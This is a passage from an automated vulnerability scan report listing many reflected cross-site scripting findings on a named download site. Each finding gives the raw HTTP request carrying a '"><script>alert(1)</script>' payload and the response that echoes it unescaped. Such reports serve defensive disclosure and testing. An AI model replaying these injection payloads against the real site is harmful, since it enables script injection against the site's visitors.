Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1" />
...[SNIP]...

4.1537. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-image-grabber-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7aa"><script>alert(1)</script>41d624163b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0" />
...[SNIP]...

4.1538. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-image-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4aaf"><script>alert(1)</script>49c2f266fc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1" />
...[SNIP]...

4.1539. http://www.x64bitdownload.com/64-bit-images-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-images-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a03"><script>alert(1)</script>f40fb3cd2d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3" />
...[SNIP]...

4.1540. http://www.x64bitdownload.com/64-bit-images-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-images-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8785c"><script>alert(1)</script>d2427e65c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1" />
...[SNIP]...

4.1541. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ae4"><script>alert(1)</script>dfb91f562dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc" />
...[SNIP]...

4.1542. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"><script>alert(1)</script>8719bbde82f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1" />
...[SNIP]...

4.1543. http://www.x64bitdownload.com/64-bit-internet-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab88e"><script>alert(1)</script>e25a069793d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d" />
...[SNIP]...

4.1544. http://www.x64bitdownload.com/64-bit-internet-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c18b"><script>alert(1)</script>4608bc7414f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1" />
...[SNIP]...

4.1545. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-kill-file-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955cd"><script>alert(1)</script>a4826d7de3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93550


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1" />
...[SNIP]...

4.1546. http://www.x64bitdownload.com/64-bit-killfile-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-killfile-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a32"><script>alert(1)</script>3d9f059b861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1" />
...[SNIP]...

4.1547. http://www.x64bitdownload.com/64-bit-mp3-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-mp3-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a24e"><script>alert(1)</script>93d52a361a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4" />
...[SNIP]...

4.1548. http://www.x64bitdownload.com/64-bit-mp3-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-mp3-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1733"><script>alert(1)</script>a1ee4a1cc7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1" />
...[SNIP]...

4.1549. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multimedia-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6969"><script>alert(1)</script>002478f819e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e" />
...[SNIP]...

4.1550. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multimedia-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b14b"><script>alert(1)</script>9323ad41c03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1" />
...[SNIP]...

4.1551. http://www.x64bitdownload.com/64-bit-multipart-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multipart-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fada"><script>alert(1)</script>70bed0cb402 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:30 GMT
Cache-Control: max-age=600
Pragma: cache
